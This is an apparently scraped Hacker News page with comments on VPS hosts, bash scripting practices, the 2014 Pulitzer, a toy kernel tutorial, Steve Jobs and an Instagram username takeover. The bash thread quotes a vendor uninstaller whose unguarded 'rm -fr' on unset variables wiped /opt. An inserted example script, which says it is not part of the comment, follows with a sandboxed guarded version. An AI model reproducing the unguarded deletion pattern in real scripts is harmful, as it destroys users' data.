Wow, that's beautiful. Currently I'm a DO customer (10$ plan), and if they had a 10$ plan I'd make the switch instantly.
43
dharma1 12 hours ago 0 replies      
ohhh yesss. DO is good for some locations like Southeast Asia but loving this upgrade for my London and Tokyo Linodes
44
hyptos 10 hours ago 1 reply      
wow EC2 instance free plan :

$ dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync

1024+0 records in

1024+0 records out

1073741824 bytes (1.1 GB) copied, 35.8268 s, 30.0 MB/s

45
kolev 6 hours ago 1 reply      
Goodbye, Digital Ocean!
46
notastartup 12 hours ago 1 reply      
These upgrades are impressive but they are a bit too late to the game. DO still has these advantages besides the cheap monthly price:

- DO has excellent and easy to understand API
- Step by step guides on setting up and running anything
- Minimal and simple

To entice me, it's no longer just a matter of price, DO has extra value added, largely due to their simplicity.

47
zak_mc_kracken 13 hours ago 1 reply      
Does any of LINode or DigitalOcean offer plans without any SSD? I couldn't find any.

I just want to install some personal projects there for which even SSD's are overkill...

48
izietto 13 hours ago 0 replies      
Do you know cheaper alternatives? Like DigitalOcean, as @catinsocks suggests
9
Better bash in 15 minutes robertmuth.blogspot.com
436 points by wsxiaoys  2 days ago   147 comments top 21
1
phaemon 1 day ago 0 replies      
If you're using:

    set -o errexit # or set -e if you prefer
Then you probably also want:

    set -o pipefail
Otherwise, it only checks that the last command succeeds, so something like:

    ls *.ssjkfle | wc -l
will actually continue as success despite the "ls" failing.

2
rshm 1 day ago 2 replies      
'set -o nounset' is a must have. I just suffered this script from Samsung Printer setting Utility. sudo ./uninstall wiped the /opt

  DEST_PATH=/opt/$VENDOR/$DEST_DIRNAME
  #remove destination
  VERSION=`cat "$DEST_PATH/bin/.version"`
  if rm -fr "$DEST_PATH"; then
  echo "INFO: $APP_NAME (ver.$VERSION) has been uninstalled successfully."
  ...
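
The failure mode in the uninstaller quoted above, next to a guarded version, as an added example that is not part of the comment or of the vendor's script. VENDOR and DEST_DIRNAME are the names from the quoted snippet; the function names and the "acme/printer" values are hypothetical, and all deletion happens in a mktemp sandbox rather than under the real /opt.

```shell
#!/bin/sh
# Added example: constructed sandbox, hypothetical function names and values.

# The quoted pattern: without nounset, unset variables expand to "" and the
# path collapses to "<root>//", which is the parent directory itself.
unsafe_dest_path() {
    ( set +u; printf '%s\n' "$1/$VENDOR/$DEST_DIRNAME" )
}

# A path component must be non-empty, must not be "." or "..", and must not
# contain a slash; otherwise the target can still collapse or escape the root.
valid_component() {
    case "$1" in
        ''|.|..|*/*) return 1 ;;
    esac
    return 0
}

# Same construction with nounset plus ${var:?}: the subshell aborts with a
# non-zero status instead of printing a collapsed path.
safe_dest_path() {
    (
        set -u
        : "${VENDOR:?VENDOR is not set}" "${DEST_DIRNAME:?DEST_DIRNAME is not set}"
        valid_component "$VENDOR" || exit 1
        valid_component "$DEST_DIRNAME" || exit 1
        printf '%s\n' "$1/$VENDOR/$DEST_DIRNAME"
    )
}

# Remove only a validated, existing install directory below the root in $1.
safe_uninstall() {
    _dest=$(safe_dest_path "$1") || return 1
    [ -d "$_dest" ] || return 1
    rm -rf -- "$_dest"
}

# Stand-alone demonstration in a throwaway directory tree (runs in a subshell
# so the caller's variables are left alone).
demo() (
    box=$(mktemp -d) || exit 1
    mkdir -p "$box/opt/other-app" "$box/opt/acme/printer/bin"
    unset VENDOR DEST_DIRNAME
    echo "unsafe path with unset vars: $(unsafe_dest_path "$box/opt")"
    safe_uninstall "$box/opt" 2>/dev/null || echo "guarded uninstall refused to run"
    VENDOR=acme DEST_DIRNAME=printer
    safe_uninstall "$box/opt" && echo "removed only $box/opt/acme/printer"
    ls "$box/opt"
    rm -rf -- "$box"
)
demo
```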

3
narsil 2 days ago 2 replies      
Another useful capability I use to do cleanup is `trap`.

    function cleanup {
        ...
    }
    trap cleanup EXIT
See more here: http://linux.die.net/Bash-Beginners-Guide/sect_12_02.html

4
kirubakaran 1 day ago 3 replies      
Use:

  #!/usr/bin/env bash
Instead of:

  #!/bin/bash
This makes the script more portable as you don't rely on bash (or any executable) to be in /bin.

http://en.wikipedia.org/wiki/Shebang_(Unix)#Portability

5
ygra 1 day ago 0 replies      
I love the very last list, "Signs that you should not be using a bash script". That should be a required part of every language/tool introduction/tutorial.

So very often people lose track of when to use what tools. (Although admittedly, so very often people are forced into some tools by external constraints.)

6
oneandoneis2 1 day ago 1 reply      
A link on HN about improving bash and it wasn't instructions on how to install zsh. I'm pleasantly surprised :)
7
earless1 2 days ago 4 replies      
I'm glad this included the "Signs you should not be using a bash script" section. Bash is a very good solution for many cases, but it becomes downright unruly when dealing with a lot of string manipulation and more complex objects.
8
rtpg 1 day ago 3 replies      
are we going to get a better bash at one point? I've always felt like the only thing bash scripts are good at describing is I/O redirection. But conditionals, dealing with variables, pretty much everything else is frustrating and error-prone

I use fish as my main shell and it's slightly better, but just testing things on variables can be a huge mess.

9
mateuszf 1 day ago 2 replies      
Nice here document feature I have found recently is heredoc with pipe, e.g.

  cat <<REQUEST_BODY |
  {
    "from" : 0,
    "size" : 40
  }
  REQUEST_BODY
  curl http://localhost -d @-
It allows to pass heredoc text to standard input of next command.

10
sleepydog 2 days ago 0 replies      
I found this web page, from the author of musl libc, very insightful:

http://www.etalabs.net/sh_tricks.html

Shell scripts are great, I use and write them every day (and quite advanced ones, too). But it's very hard to make a shell script robust.

Unfortunately it's hard to find a replacement that is stable and installed everywhere. Perl is pretty close. And python too, if you are careful about making your script compatible with all the different versions.

11
dingaling 1 day ago 1 reply      

  complete -r
disables Bash 'smart tab completion', which in theory is a great idea ( use tab to complete arguments or only list files applicable to the program ) but which never seems to work properly for me.

Disabling it saves a lot of frustrated tab-banging.

12
zx2c4 1 day ago 0 replies      
If you'd like to see a decently written piece of bash that incorporates many of these suggestions, check out pass, the standard unix password manager.

Project page: http://www.zx2c4.com/projects/password-store/

Source: http://git.zx2c4.com/password-store/tree/src/password-store....

13
Karunamon 1 day ago 3 replies      
Try moving all bash code into functions leaving only global variable/constant definitions and a call to main at the top-level.

One of my main complaints with bash.. the file is evaluated in order - you can't call a function on the line before it's declared.

This fails:

    #!/usr/bin/env bash
    bar='bar'
    foofunction
    foofunction(){
      echo 'foo'
      echo $bar
    }
Basically you have to write your entire script in reverse, and i'm unaware of a good way to get around it.

14
hyp0 1 day ago 2 replies      
Excellent, bash the good parts. More than 15 minutes though.

Googling bashlint, shlint turns up some discussion (bash -n, ksh -n, zsh -n, some github projects), but I doubt they cover this article's specifics - though most (all?) of it could be automatically checked. I think some could be automatically added (e.g. set -o nounset) - perhaps a bash-subset (or coffeescript-style language) possible...

15
njharman 1 day ago 1 reply      
>> This will take care of two very common errors:
>> Referencing undefined variables (which default to "")
>> Ignoring failing commands

Better is subjective... About half my scripts depend on those features. For default arguments, and fail early.

16
cynik_ 1 day ago 1 reply      
I'd really recommend using `set -x` or `bash -x script` to sanity check all the commands and expected output.

See http://www.tldp.org/LDP/Bash-Beginners-Guide/html/sect_02_03...

17
voltagex_ 1 day ago 0 replies      
I also like http://google-styleguide.googlecode.com/svn/trunk/shell.xml but of course some things that work well for Google might not work for you.
18
knyt 1 day ago 0 replies      
The author uses ${} a lot more than I see in most code. Is it helpful to always use the ${var} syntax instead of simply writing $var?

I can see universal application of ${} being advantageous in avoiding accidental "$foo_bar where you meant ${foo}_bar" situations, and ${} makes it clearer that you're referencing a variable. The only cost would seem to be more typing.

19
dllthomas 1 day ago 0 replies      
One thing I've liked is throwing ${PIPESTATUS[*]} at the front of my PS1.
20
celebril 1 day ago 1 reply      
Or you can just use Zsh, which is superior in any way to Bash. ;)
21
dsfadadsffd 2 days ago 3 replies      
There is no need for long set flags, e.g. use

  set -e
and not:

  set -o err
etc.

10
The Guardian and Washington Post win the 2014 Pulitzer Prize for Public Service pulitzer.org
419 points by danso  3 days ago   41 comments top 9
1
etiam 3 days ago 1 reply      
In terms of importance, I think this was practically a given, but I've seen statements from people doubting if the Pulitzer Prize Board would have the courage to make a decision that still wouldn't sit well with certain powerful people.

Turns out they did. I'm very pleased to see that. Congratulations to the winners!

2
jwr 3 days ago 1 reply      
...while Edward Snowden, the source of all the information they published, is being hunted down and prosecuted.

Hmm.

3
danso 3 days ago 0 replies      
Journalism geekery: the "Public Service" award is often considered the best of the Pulitzers, partly because it is relatively equally distributed among smaller, lesser-known organizations as well as the big organizations...so it's sort of a implicit statement on how great journalism shouldn't be dependent on market size and staff resources.

So when a big organization like the Washington Post, and the Guardian US, win it, that's a strong statement. They could've just as likely been given the National or Investigative reporting awards.

(also, unlike the other prizes, there is no cash prize for the Public Service award)

The WaPo has won it before, including for Watergate and the Walter Reed investigation: http://www.pulitzer.org/bycat/Public-Service

4
hpriebe 3 days ago 1 reply      
Interesting to see that the runner up - Newsday - was selected for using digital tools to expose shootings, beatings and other concealed misconduct by some Long Island police officers. This highlights the increasingly complementary role of digital tools and traditional reporting.

Anyone know what kind of digital tools they used?

Anyone know of other digital tools journalists/the press use to investigate/uncover content?

5
lawnchair_larry 3 days ago 1 reply      
So I guess Glenn Greenwald is officially a journalist.
6
spacefight 3 days ago 0 replies      
This is great news and well deserved. I hope that the prize strongly motivates those in charge at either news company to press on with their coverage.
7
e15ctr0n 2 days ago 0 replies      
The full list of winners[0] and runners-up[1] is available on pulitzer.org.

[0] http://www.pulitzer.org/node/8501

[1] http://www.pulitzer.org/finalists/2014

8
subdane 3 days ago 0 replies      
The awards are for breaking the Snowden secret surveillance revelations.
9
dobbsbob 3 days ago 1 reply      
No love for Der Spiegel?
11
Kernel 101 - Let's write a Kernel arjunsreedharan.org
394 points by slashdotaccount  3 days ago   99 comments top 21
1
deathanatos 3 days ago 1 reply      
I kinda wish some of the FS utilities were better. Despite FUSE, mounting a block device (like, disk image) as a non-root user is tough, so writing to an image with actual partitions/FS on it is difficult, especially to script, especially if you don't want to sudo in a build script. losetup on a disk image doesn't (to my knowledge) detect partitions for reasons unknown to me.

Bootsectors are similar. You can't just install grub to a disk image. (You have to losetup it, at the very least, which implies root. Why can't I just install to a file?)

You want a script/build system that allows you, at the very least, to:

1. Code.

2. Run build system/script.

3. Fire up qemu or similar.

You can't be rebooting. Ideally, it'd be great to do this in userspace.

That said, if you're starting out, just do [boot sector] + [kernel] = tada image until you need to do otherwise. (Really, do whatever works and is easy.)

That said, I've found a few somewhat helpful tools.

fuseloop[1] takes a file and offset/size, and exposes a single file. If you have a partitioned disk image, then you can feed it the partition offset, and it gives you back something you can format as an FS. (e.g., you can run ext2fs on.)

Then there's fuse.ext2[2], which mounts an ext2 FS on FUSE, so non-root usable again. Note that I'm linking to my fork of it, since the original didn't build for me, but I didn't write it. (Which I fixed, and sent a pull request, but never heard back.)

Finally - and sorry to peddle my own stuff again - I wrote a Python library for dealing with the MBR.[3] I use it to figure out offsets and sizes in a disk image.

I've had a bit of fun writing a boot loader, and I've managed to get it to load up its stage 2 and switch to 32-bit pmode. Had a fun error where a division instruction was throwing things into a triple fault; see [4] if you want to see how a division instruction can fail without dividing by zero (which was the first thing I checked). The disk layout is currently:

  [boot sector] [stage 2] [kernel] [ partitions, FS, real data, etc. ]
stage2's size is hard coded into the first sector of stage 2 (into itself), and the kernel's location and size will be similarly hard coded into it as well. (When I get there. Disks in pmode are different, as you can't just have the BIOS do all the work for you, sadly!) And by hard-coded, a build script calculates and just re-writes a few bytes.

[1]: https://github.com/jmattsson/fuseloop

[2]: https://github.com/thanatos/fuse-ext2-fakeFS

[3]: https://github.com/thanatos/pymbr

[4]: http://stackoverflow.com/questions/21212174/why-cant-i-step-...

2
exDM69 2 days ago 1 reply      
This seems like a good start but it's worth noting that it isn't guaranteed to work correctly.

The problem is that the control is passed to C code with no stack space set up. It works out of pure luck because the compiler has decided to keep all variables in registers and changing your C compiler flags might make this fail in interesting ways.

Another thing that is missing is clearing the .BSS section before passing control to the C code. It's not used at the moment, though.

I am pointing these things out because in my own Ring0 programming projects I spent a lot of time debugging some failures related to stack space and an un-initialized BSS section.

3
akkartik 3 days ago 1 reply      
I got this running on qemu by cannibalizing a tiny bit of code from xv6 (http://pdos.csail.mit.edu/6.828/2012/xv6.html) to replace the GRUB dependency. After cloning and building mkernel according to its instructions:

  $ git clone git://pdos.csail.mit.edu/xv6/xv6.git
  $ cd xv6
  $ make
Now you should be able to run xv6 by itself:

  $ path-to-qemu/x86_64-softmmu/qemu-system-x86_64 -serial mon:stdio -hdb fs.img xv6.img -m 512
To run mkernel on qemu, we'll replace xv6's kernel with mkernel's:

  $ dd if=/dev/zero of=mkernel.img count=10000
  $ dd if=bootblock of=mkernel.img conv=notrunc
  $ dd if=../mkernel/kernel of=mkernel.img seek=1 conv=notrunc
Now you can boot up the mkernel.img rather than xv6.img:

  $ path-to-qemu/x86_64-softmmu/qemu-system-x86_64 -serial mon:stdio -hdb fs.img mkernel.img -m 512
(Based on xv6 at hash ff2783442ea2801a4bf6c76f198f36a6e985e7dd and mkernel at hash 42fd4c83fe47933b3e0d1b54f761a323f8350904. Ping me if you have questions; email in profile.)

4
bebop 3 days ago 0 replies      
This is a great resource for anyone who would like to take this further: http://wiki.osdev.org/Expanded_Main_Page

In particular, setting up interrupt handlers, paging, and getting a PIC setup is pretty neat.

5
grahamedgecombe 2 days ago 0 replies      
There's a slight problem in this tutorial in that it assumes ESP (the stack pointer) will be defined by the boot loader to point to an appropriate location for the stack. However, the Multiboot standard states that ESP is undefined [1], and that the OS should set up its own stack as soon as it needs one (here the CALL instruction uses the stack, and the compiled C code may well too).

An easy way to solve this is to reserve some bytes in the .bss section of the executable for the stack by adding a new section in the assembly file:

  [section .bss align=16]
    resb 8192
    stack_end:
Then before you make use of the stack (between `cli` and `call kmain` would be appropriate in this case), you need to set the stack pointer:

  mov esp, stack_end
[1]: https://www.gnu.org/software/grub/manual/multiboot/multiboot...

6
mbillie1 3 days ago 2 replies      
Very cool. I personally (as a developer without a CS background) find these sorts of posts wonderfully interesting, even if this kernel, as pointed out in this thread, lacks a lot of what a normal kernel does. I'd love to see one of these for a compiler!
7
ahelwer 3 days ago 1 reply      
Neat read so far! Not done yet, but I think I've found a small error in kernel.c: the attribute byte of the characters in "my first kernel" should be set to 0x02, not 0x07.

edit: I misread. 0x07 is intentional, 0x02 was mentioned as an alternative. Good post!

8
tbrock 3 days ago 2 replies      
This was fantastic. My only question is, how does one gain knowledge of the required x86 hardware specifics he mentions? I don't know where to begin looking to uncover these sorts of things:

  - The x86 CPU begins execution at the physical address [0xFFFFFFF0]
  - The bootloader loads the kernel at the physical address [0x100000]
  - The BIOS copies the contents of the first sector to physical address [0x7c00]
Is there an x86 instruction manual or is this sort of thing passed down through generations of engineers?

9
boulderdash 3 days ago 2 replies      
If anybody is doing this, let me share some words of advice based on experience.

Please use a virtual machine instead of doing this on your primary machine. You eliminate the risk of messing up your machine. Also, if you set up the VM properly, you get a debugger.

10
kyberias 3 days ago 8 replies      
I'm not exactly Linus Torvalds but I'm pretty sure a program that prints one line of text is not "a kernel". :)
11
AdrianoKF 3 days ago 2 replies      
Looks great, will keep an eye on this!

I also really enjoyed James Molloy's OS kernel development tutorial at http://www.jamesmolloy.co.uk/tutorial_html/, which takes you from "Hello World" to some real toy OS kernel implementation.

12
aaren 3 days ago 3 replies      
Can anyone give me an idea how much different this would be for 64bit? Do I just change the nasm directive to `bits 64`?
13
dkarapetyan 3 days ago 1 reply      
I really like the new HN. Quality of articles is way up.
14
jonalmeida 3 days ago 0 replies      
I just finished an Operating Systems final today and the entire class was conceptual and learning fundamentals, while I craved to get my hands dirty and actually try to make a simple OS.

I'll definitely be playing around with this. Thanks!

15
tpush 2 days ago 0 replies      
I have done the same, sort of, only eschewing BIOS for UEFI and thus getting straight to Long Mode :-).

It's pretty basic, currently just boots up and prints the memory map.

It's written in C++11 with the aim to be as clear as possible: https://github.com/thasenpusch/simplix Have a look :-).

16
zenbowman 3 days ago 0 replies      
Looks great, looking forward to dive into this.
17
anarion 2 days ago 0 replies      
Why do kernel tutorials always say they need nasm? GCC already comes with an assembler, so simply use it instead of installing other software. And if you prefer Intel syntax simply add ".intel_syntax;"
18
acomjean 3 days ago 4 replies      
Why C?

I'm just curious if another language can be used. (c++, go, rust).

19
tsenkov 2 days ago 0 replies      
Awesome read, thanks.
20
aortega 3 days ago 3 replies      
Great! except that to be called a kernel it's missing just a process manager, memory manager, filesystem, process separation and hardware abstraction. Yeah I'm that guy, down vote me as you wish, the article is still wrong.

It's a way to load a ring-0 application into grub. Pretty cool, but not a kernel.

21
whydo 2 days ago 1 reply      
The first question is:

Why?

We already have a whole bunch of operating systems, many of them free.

One of the frequent problems with a lot of free/open source software folks is that they lack direction. This type of thing where we do stuff just to do stuff probably won't fly in one of the leading tech companies.

Why don't you figure out a real problem people have and look for ways to solve that, instead of just doing random "interesting" stuff that wastes people's valuable time?

12
Memories of Steve donmelton.com
376 points by zekers  6 days ago   152 comments top 23
1
salgernon 6 days ago 9 replies      
Back in 1999 or 2000, shortly after Steve had rejiggered the cafeteria staff, I was walking back to my office in another building with an "afternoon doughnut" - that is, one that hadn't sold in the morning at the coffee place in the main lobby, and probably sold at a discount.

I passed Steve in the hall and he glared at me as I walked with my doughnut. Steve was in great health in those days while I was pasty and obese. (Still am, sad to say.).

But I was happy with my doughnut. Steve glared at me but didn't say anything. I slunk away.

The next day, there were no more doughnuts at any of the cafs on the main campus. I don't think it's a coincidence.

2
baldfat 6 days ago 1 reply      
I had to stop reading. I also worked for a micro managing CEO/President and I HATED EVERY MINUTE. Knowing that if you did the slightest misstep or were falsely accused you were fired and there was a morning meeting the next day to tell everyone that so and so was no longer with the company. NO THANK YOU!!!
3
adrianoconnor 6 days ago 1 reply      
I always love to read Don's stories, they're always pretty great, and this post is no exception. The last few paragraphs are poignant, and not because it's about Steve, but because the emotion is real and you can relate to it.

Anyway, if you enjoyed this, you should read the history of Safari posts he did a while back, also a podcast he was a guest on one time, though I forget who it was with -- ah, Debug I think -- that was really excellent and well worth listening to.

4
general_failure 6 days ago 4 replies      
It looks like some people like Steve are charismatic enough to get the complete devotion of very talented people. It's a great personality trait to have and pretty much guarantees success. We all know geniuses in our everyday life like Wozniak, Bob, Cook. But how many of us can get these guys to be terrified of us, make them change their lives for our vision and make them give us their complete attention... That's the beauty of Steve. Despite flaws in his character, people seem to feel privileged working for him.
5
ZeroGravitas 6 days ago 1 reply      
If after working with him for a decade you have to take a deep breath before you can give him your honest opinion on something, then he's not a busy executive who prioritizes efficient information exchange, he's an asshole.
6
exodust 5 days ago 0 replies      
This story says more about the insecurity of the Safari guy than it does about Jobs.

Sounds like people at Apple spent too much time worrying about what Steve thought of them, whether he'd remember their names or invite them to meetings.

While everyone is worried about what one man thinks, the man himself was thinking about design and business issues, trying to solve problems.

Funny how bookmarks was never really solved in Safari. On my iPad, I hate the bookmarks functionality, it confuses me pretty much every time. When I try to find a bookmark, or add a bookmark, every time it seems I have to "figure out" and remember how to do that. It's not intuitive or snappy. And now with iOS7 flat design, all your bookmarks and history appears as one big list - black text on white background. The lack of interface delineation means elements bleed into other elements and make it harder to mentally remember where things are found.

If Steve were still around, he'd be kicking someone's ass over the half-baked iOS7 flat design.

7
mildtrepidation 6 days ago 0 replies      
It's certainly interesting to read this sort of reflection. The author discusses Jobs' mannerisms without either worshiping or demonizing him, which is refreshing.
8
xcntktn 6 days ago 0 replies      
Stories like this one and Glenn Reid's essay[1] about working with Steve on iMovie seem to be vastly more informative than any movie or book on SJ.[2] One of the biggest takeaways from both of these essays is that working with Steve was an iterative process. Pop culture always highlights "eureka" moments where a problem is solved all at once in a brilliant flash of insight, yet when you read these first-hand accounts, the story is the opposite: that making something great is a slow and repetitive process, with lots of follow-up meetings and gradual improvement towards the final product. Eureka moments look good on TV, but in the real world, great things are built by long-term focus and hard work from highly talented people with uncompromisingly high standards. I have no idea how or even if that could be shown in a movie, but I'm very thankful we have these accounts. I hope more people who worked with Steve during his second tenure eventually put their thoughts down in writing and share them so that we can all gain more of these types of insights.

[1]http://inventor-labs.com/blog/2011/10/12/what-its-really-lik...

[2]There's also Andy Hertzfeld's folklore.org, however that is focused on Steve's original tenure at Apple, not the "comeback" from the late-90s on.

9
gdonelli 6 days ago 0 replies      
Don has always been such a positive person to be around. Great memories. Thanks for sharing.
10
ghiculescu 6 days ago 1 reply      
Some great stories there. Wasn't sure on the Apple stores presentation joke though, can anyone explain the reference?
11
ksec 6 days ago 3 replies      
I was reading and hoping there was an explanation why Safari for Windows was discontinued. It is the only popular WebKit browser ( after Chrome fork to Blink ) on Windows.

Otherwise another great piece.

12
tareqak 6 days ago 2 replies      
I enjoyed the recollections. I probably would have been afraid of his shadow if I was there.

On another note, it would be interesting to see if a website containing all these memories of Steve Jobs ever comes about. A crowdsourced biography if you will: storiesabout/stevejobs .

13
mathattack 6 days ago 0 replies      
Great stories. It says a lot about Apple at that time, in addition to Steve. The personal side is good too.

Yes, Steve could be intense at times. But he was also a real person. He had to deal with the ordinary and mundane aspects of life like everyone else. Maybe even enjoy them.

14
hubtree 6 days ago 2 replies      
This part sums up why I quit using OS X for my personal projects: "And if your software crashed, you didn't make excuses. You just made damn sure that particular scenario didn't happen again. Ever."

In making sure nothing ever crashes, Apple has moved more and more to an OS that is too restrictive for my taste.

15
throwaway7548 6 days ago 5 replies      
According to Wozniak, Jobs told him that Atari gave them only $700 (instead of the offered $5,000), and that Wozniak's share was thus $350.[65] Wozniak did not learn about the actual bonus until ten years later, but said that if Jobs had told him about it and had said he needed the money, Wozniak would have given it to him.[66]
---

End of story. Before continuing celebrating Jobs, ask yourself a question, do you want to promote that kind of behavior in the Valley?

16
jayvanguard 6 days ago 0 replies      
Sounds like you have to be a sycophant to work for him.
17
theRhino 6 days ago 0 replies      
this is hilarious
18
pskittle 6 days ago 0 replies      
Thanks for posting this!
19
SimHacker 6 days ago 0 replies      
At the National Air and Space Museum reception during Washington DC EduCom in 1988, I took a big bite out of one lobe at the bottom of a three lobed red bell pepper so it looked like an alien's face, and held it up to Steve Jobs, and said "Earthman, give me your seed!"

He looked at me funny, but I couldn't tell if he got the reference to Bizarre Sex #10: http://silezukuk.tumblr.com/post/3151672333 [NSFW]

20
luser 6 days ago 1 reply      
Alternative title: Hagiography of a Dead Psychopath CEO
21
jmnicolas 6 days ago 2 replies      
Am I the only one fed-up with Steve Jobs stories ?
22
misingnoglic 6 days ago 0 replies      
Lol, some of it seems a bit stockholm syndrome-y, but hilarious nonetheless.
23
normloman 6 days ago 1 reply      
Why are we still talking about this guy. I'll bet my life savings that when Woz dies, we'll talk about it for around 2 months.
13
They say nothing will change medium.com
369 points by jonsuh  1 day ago   115 comments top 31
1
gnu8 1 day ago 10 replies      
Those who are defending this as a reasonable and commonplace policy are dissembling at best. This is another example of the emerging electronic class system. Those who are members of the Silicon Valley clique are privileged to take what they want from those who are not. Recall the Googler who was able to have a web page he didn't like shut down, just by calling his connection at Digital Ocean.

One might argue that a thing such as an Instagram account is just a service provided by a business and the business can do as it likes, but this isn't the case. A social media account is a vehicle for the user to interact with the entire world, and it shouldn't be able to be unilaterally revoked, especially if the only reason is to give it to a "more deserving" insider. We need a system of due process for situations like this.

2
josefresco 1 day ago 3 replies      
Before we all seemingly jump on the "she should have updated her account" bandwagon, it would help to see actual evidence of her inactivity, or at least evidence/statements in Instagram's TOS that state what "inactive" really means.

This doesn't cut it: "We encourage people to actively log in and use Instagram once they create an account."

How long can I go idle before Instagram takes my account back?

Also, as someone else stated in this thread the very least Instagram could have done was to email her and inform her that she was about to lose her account due to inactivity.

Lastly, it's important to note that Instagram didn't just "prune" her account, they renamed it and gave her original account name to an employee. If they were concerned with squatters or dormant accounts they would have actually nixed the account, not renamed it to something else.

3
simonsarris 1 day ago 5 replies      
Oh guffaw. Even our beloved Github has a means to let you unseat inactive account names.

https://help.github.com/articles/name-squatting-policy

(And they should, I think.)

Since at least 2012 Instagram has had this in their terms:

> 4. We reserve the right to force forfeiture of any username that becomes inactive, violates trademark, or may mislead other users.

So whine about the policy if you don't like it, but don't whine that Instagram has materially changed.

4
brandon272 1 day ago 0 replies      
I think it's in extremely bad taste to remove an account that's ever had content uploaded to it. Person registered two years ago and hasn't uploaded anything? Sure, prune the account. User creates an Instagram account and uploads some nice family photos and doesn't sign in for a year? Leave it alone!
5
steven2012 1 day ago 0 replies      
It's clear that Facebook etc employees are higher on the virtual caste system than the rest of us peons. The more and more they make this evident, the less interested regular people will be in participating in their virtual world.
6
drgath 1 day ago 1 reply      
As others have mentioned, this was probably due to inactivity. I stopped using Instagram years ago, but still had 'instagram.com/derek', and just checked to see if that was still my username. Nope, it is now 'derek______________', just like '_____kathleen'. The fact that a FB employee now owns the 'kathleen' user means they probably have an internal reservation system for expired accounts, which is a nice perk.
7
lazerwalker 1 day ago 3 replies      
Whoever you think is in the wrong here, the real takeaway is a reminder that when you use a VC-funded for-profit service, you don't "own" anything.
8
avree 1 day ago 4 replies      
This isn't actually an uncommon policy. For example, Twitter lets (or used to let?) you take a username that's inactive for 9 months.

Source: http://sarahwallace.wordpress.com/2010/09/23/how-to-request-...

The Facebook stuff is probably a red herring here. If there was activity on the account, I bet this would never have happened.

9
klenwell 1 day ago 1 reply      
Worried about having someone steal your invaluable Twitter or Instagram username?

The solution is obviously to immediately litter all your social media accounts with such foul loathsome toxic content that no one else would want to touch them again for at least the next 1000 years.

10
jonsuh 1 day ago 4 replies      
Taken straight from Instagram's policy:

> "We encourage people to actively log in and use Instagram once they create an account. To keep your account active, be sure to log in and share photos, as well as like and comment on photos. Accounts may be permanently removed due to prolonged inactivity, so please use your account once you sign up!"

Source: https://www.facebook.com/help/instagram/294919817276863

The wording is terribly obtuse and seems targeted more for username squatters.

Would be helpful if Instagram defined what a period of prolonged inactivity is. Shady nonetheless, considering they didn't even notify her informing her that her username was revoked due to inactivity.

11
tensafefrogs 1 day ago 0 replies      
"A few months ago while tagging my wife"

"This morning I told her I Instagrammed a photo of our kids that she should see."

Instagram names are not domain names, and it sounds like she doesn't use the account. Most services have a clause that lets them reclaim inactive accounts after a set period of time.

12
ampersandy 1 day ago 1 reply      
What does this have to do with Facebook and the acquisition? Anyone working at Instagram pre-acquisition would also have been able to reclaim inactive handles.

Twitter does this as well and that's how I got my current username. There are a couple of things that are required before you could reclaim a handle (I forget the exact timespans, but it was close to this):

    * Has not logged in for one year
    * Has not tweeted in a year and a half
    * Does not have any applications linked to Twitter
If Instagram has a similar policy, I really don't have any sympathy that the username was taken.

13
uptown 1 day ago 0 replies      
Update Apr 16, 2014 @2:34pm: I'm very pleased to announce that Facebook / Instagram did the right thing and delivered my wife's Instagram handle back to its rightful place: http://instagram.com/kathleen
14
gordaco 1 day ago 0 replies      
This looks like an employee acting on her own, thinking (wrongly) that the account was not active and nobody would notice if she took over the username. Still, it's a disturbing issue that shouldn't have been allowed to happen, so if this is the case I hope the employee gets some penalty. And the fact that this was possible, or maybe even legal (I don't know Instagram's terms of service), doesn't make it less of a dick move.

I was an employee for a local social network with about ~10mil registered users (~5mil daily users). It was much smaller than Instagram, but despite that (or precisely because of that) things like this were completely forbidden.

15
raesene3 1 day ago 0 replies      
What I think is interesting about this is more the general case than this specific example. I'd say that people's social media handles are becoming more and more important to them, so loss of them becomes increasingly bad.

A lot of people in the tech world are probably more known by things like their twitter handle than their real name.

With free services (and indeed perhaps with paid for) there's not a lot to stop a company changing the ToS to allow for usernames to be transferred as they like (assuming it's not already in the ToS).

Now if your chosen handle is pretty niche (no one who's not a fan of 90's ADnD settings is likely to want mine), it's probably not a big risk, but for other ones it seems plausible to suggest that a company might start seeing them as a valuable asset, to be monetized..

16
owenversteeg 1 day ago 0 replies      
This happened to me (employee of the company took my username) with a different service, and a quick tweet to the founder had my account restored.

I'm not going to identify the website because the person that made it is a nice guy in general and he restored my account right after I asked.

17
dmschulman 1 day ago 0 replies      
This is the new norm now that these web services are no longer a niche product. Some kind of set standard for inactivity would be nice so users are aware of when they are in danger of losing their username.

I know many who set out to register popular Twitter and Soundcloud names when those services launched just so they could sit on them and possibly make a buck. Those username policies are out there to combat this kind of behavior but it's crummy to see when those policies actually affect legitimate users.

18
thehme 1 day ago 0 replies      
I read "..she opened up Instagram on her phone (she's not a regular on the service anymore)", and wondered, does he mean that @kathleen has not been using it for a while (months)? There is no justification for stealing a handle, but I was just wondering. I recall once I wanted to have a specific handle on twitter for an idea I had, so I contacted the owner via a private message. He/she has no tweets and to this day, I have not heard from him/her yet. Would anyone be open to perhaps having an "expiration" date on our accounts? Sometimes I feel like there are robots out there claiming every possible handle, so that, idk, they can sell it later?
19
dublinben 1 day ago 1 reply      
You have no ownership over a username in a private service. Your access can (and will) be terminated at any time in accordance to their Terms of Service. If you want to maintain control over your identity and presence online, you ought to use self-hosted services like Pump.io or Diaspora.
20
xacaxulu 1 day ago 0 replies      
When can we start taking accounts of deceased persons?
21
yankoff 1 day ago 0 replies      
This is just unbelievable.. Have you tried to email their support? It's hard to believe that that could be an acceptable practice at any company, I would assume it's just some employee being a jackass.
22
rch 1 day ago 4 replies      
Why don't new services default to using a random string as an identifier, along with an alias for display, instead of requiring a unique username?

Managing overlapping names among friends is something most people know how to do well enough already.

23
reshambabble 1 day ago 0 replies      
There are two interesting groups at play here - the tech companies that own all data, usernames, etc. on their platform and the user that needs to be on their platform for the company to exist and be successful. Our private information becomes public information when we share it with some of these companies, and they are given permission to own and use the information to a certain extent. They promise us security and stability at first because they need us, but when they don't depend on us anymore they can get away with sacrificing those users who don't contribute enough in order to serve their own interests. Because what does losing one person do to them? Are we all going to boycott Instagram now? Probably not. There definitely needs to be some regulation on how internet-based businesses can use and change a user's information because our public/internet identity has become so integrated into our lives that an incident like a sudden change in username can feel like a violation of privacy (even when it's not really one).
24
emsy 1 day ago 0 replies      
